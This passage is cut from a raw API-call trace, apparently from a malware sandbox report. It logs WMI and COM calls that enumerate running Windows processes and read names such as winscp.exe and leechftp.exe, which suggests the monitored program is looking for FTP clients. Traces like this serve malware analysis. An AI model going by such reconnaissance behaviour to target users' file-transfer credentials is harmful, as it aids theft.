Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x570b208) returned 0x0 [0279.535] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x570b208, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.535] WbemDefPath:IUnknown:Release (This=0x570b208) returned 0x3 [0279.535] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e0e8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.535] WbemDefPath:IUnknown:Release (This=0x570e0e8) returned 0x2 [0279.535] WbemDefPath:IUnknown:Release (This=0x570e0e8) returned 0x1 [0279.535] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e0e8, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x570e0e8) returned 0x0 [0279.536] WbemDefPath:IUnknown:AddRef (This=0x570e0e8) returned 0x3 [0279.536] WbemDefPath:IUnknown:Release (This=0x570e0e8) returned 0x2 [0279.536] WbemDefPath:IWbemPath:SetText (This=0x570e0e8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3004\"") returned 0x0 [0279.536] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.536] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.536] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.536] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.536] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.536] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.536] IWbemClassObject:Get (in: This=0x57123f8, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27cfd74*=0, plFlavor=0x27cfd78*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="winscp.exe", varVal2=0x0), pType=0x27cfd74*=8, plFlavor=0x27cfd78*=0) returned 0x0 [0279.536] SysStringByteLen (bstr="winscp.exe") returned 0x14 [0279.536] SysStringByteLen (bstr="winscp.exe") returned 0x14 [0279.536] IWbemClassObject:Get (in: This=0x57123f8, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27cfd74*=8, plFlavor=0x27cfd78*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="winscp.exe", varVal2=0x0), pType=0x27cfd74*=8, plFlavor=0x27cfd78*=0) returned 0x0 [0279.536] SysStringByteLen (bstr="winscp.exe") returned 0x14 [0279.536] SysStringByteLen (bstr="winscp.exe") returned 0x14 [0279.537] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x570b238, puReturned=0x27bb39c | out: apObjects=0x570b238*=0x5712590, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.538] IUnknown:QueryInterface (in: This=0x5712590, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5712590) returned 0x0 [0279.538] IUnknown:QueryInterface (in: This=0x5712590, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.538] IUnknown:QueryInterface (in: This=0x5712590, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.539] IUnknown:AddRef (This=0x5712590) returned 0x3 [0279.539] IUnknown:QueryInterface (in: This=0x5712590, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.539] IUnknown:QueryInterface (in: This=0x5712590, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.539] IUnknown:QueryInterface (in: This=0x5712590, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5712594) returned 0x0 [0279.539] IMarshal:GetUnmarshalClass (in: This=0x5712594, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.539] IUnknown:Release (This=0x5712594) returned 0x3 [0279.539] IUnknown:QueryInterface (in: This=0x5712590, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.540] IUnknown:Release (This=0x5712590) returned 0x2 [0279.540] IUnknown:QueryInterface (in: This=0x5712590, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5712590) returned 0x0 [0279.540] IUnknown:AddRef (This=0x5712590) returned 0x4 [0279.540] IUnknown:Release (This=0x5712590) returned 0x3 [0279.540] IUnknown:Release (This=0x5712590) returned 0x2 [0279.540] CoTaskMemFree (pv=0x570b238) [0279.540] IUnknown:AddRef (This=0x5712590) returned 0x3 [0279.541] IWbemClassObject:Get (in: This=0x5712590, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.541] IWbemClassObject:Get (in: This=0x5712590, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3012\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.541] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3012\"") returned 0x66 [0279.541] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3012\"") returned 0x66 [0279.542] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.542] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.542] IUnknown:Release (This=0x500344) returned 0x1 [0279.543] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x570b238) returned 0x0 [0279.543] WbemDefPath:IUnknown:QueryInterface (in: This=0x570b238, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.543] WbemDefPath:IClassFactory:CreateInstance (in: This=0x570b238, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x570e1c8) returned 0x0 [0279.543] WbemDefPath:IUnknown:Release (This=0x570b238) returned 0x0 [0279.543] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e1c8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x570e1c8) returned 0x0 [0279.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e1c8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.544] WbemDefPath:IUnknown:AddRef (This=0x570e1c8) returned 0x3 [0279.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e1c8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e1c8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e1c8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x570b248) returned 0x0 [0279.544] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x570b248, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.545] WbemDefPath:IUnknown:Release (This=0x570b248) returned 0x3 [0279.545] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e1c8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.545] WbemDefPath:IUnknown:Release (This=0x570e1c8) returned 0x2 [0279.545] WbemDefPath:IUnknown:Release (This=0x570e1c8) returned 0x1 [0279.545] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e1c8, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x570e1c8) returned 0x0 [0279.545] WbemDefPath:IUnknown:AddRef (This=0x570e1c8) returned 0x3 [0279.545] WbemDefPath:IUnknown:Release (This=0x570e1c8) returned 0x2 [0279.545] WbemDefPath:IWbemPath:SetText (This=0x570e1c8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3012\"") returned 0x0 [0279.545] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.546] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.546] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.546] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.546] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.546] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.546] IWbemClassObject:Get (in: This=0x5712590, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d05ec*=0, plFlavor=0x27d05f0*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="leechftp.exe", varVal2=0x0), pType=0x27d05ec*=8, plFlavor=0x27d05f0*=0) returned 0x0 [0279.546] SysStringByteLen (bstr="leechftp.exe") returned 0x18 [0279.546] SysStringByteLen (bstr="leechftp.exe") returned 0x18 [0279.547] IWbemClassObject:Get (in: This=0x5712590, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d05ec*=8, plFlavor=0x27d05f0*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="leechftp.exe", varVal2=0x0), pType=0x27d05ec*=8, plFlavor=0x27d05f0*=0) returned 0x0 [0279.547] SysStringByteLen (bstr="leechftp.exe") returned 0x18 [0279.547] SysStringByteLen (bstr="leechftp.exe") returned 0x18 [0279.547] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x570b278, puReturned=0x27bb39c | out: apObjects=0x570b278*=0x5712728, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.548] IUnknown:QueryInterface (in: This=0x5712728, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5712728) returned 0x0 [0279.548] IUnknown:QueryInterface (in: This=0x5712728, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.548] IUnknown:QueryInterface (in: This=0x5712728, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.549] IUnknown:AddRef (This=0x5712728) returned 0x3 [0279.549] IUnknown:QueryInterface (in: This=0x5712728, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.549] IUnknown:QueryInterface (in: This=0x5712728, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.549] IUnknown:QueryInterface (in: This=0x5712728, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x571272c) returned 0x0 [0279.549] IMarshal:GetUnmarshalClass (in: This=0x571272c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.549] IUnknown:Release (This=0x571272c) returned 0x3 [0279.549] IUnknown:QueryInterface (in: This=0x5712728, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.549] IUnknown:Release (This=0x5712728) returned 0x2 [0279.550] IUnknown:QueryInterface (in: This=0x5712728, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5712728) returned 0x0 [0279.550] IUnknown:AddRef (This=0x5712728) returned 0x4 [0279.550] IUnknown:Release (This=0x5712728) returned 0x3 [0279.550] IUnknown:Release (This=0x5712728) returned 0x2 [0279.550] CoTaskMemFree (pv=0x570b278) [0279.550] IUnknown:AddRef (This=0x5712728) returned 0x3 [0279.550] IWbemClassObject:Get (in: This=0x5712728, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.551] IWbemClassObject:Get (in: This=0x5712728, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3020\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.551] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3020\"") returned 0x66 [0279.551] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3020\"") returned 0x66 [0279.551] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.551] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.551] IUnknown:Release (This=0x500344) returned 0x1 [0279.552] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x570b278) returned 0x0 [0279.552] WbemDefPath:IUnknown:QueryInterface (in: This=0x570b278, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.552] WbemDefPath:IClassFactory:CreateInstance (in: This=0x570b278, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x570e2a8) returned 0x0 [0279.552] WbemDefPath:IUnknown:Release (This=0x570b278) returned 0x0 [0279.552] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e2a8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x570e2a8) returned 0x0 [0279.553] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e2a8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.553] WbemDefPath:IUnknown:AddRef (This=0x570e2a8) returned 0x3 [0279.553] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e2a8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.553] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e2a8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.553] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e2a8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x570b288) returned 0x0 [0279.553] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x570b288, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.553] WbemDefPath:IUnknown:Release (This=0x570b288) returned 0x3 [0279.554] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e2a8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.554] WbemDefPath:IUnknown:Release (This=0x570e2a8) returned 0x2 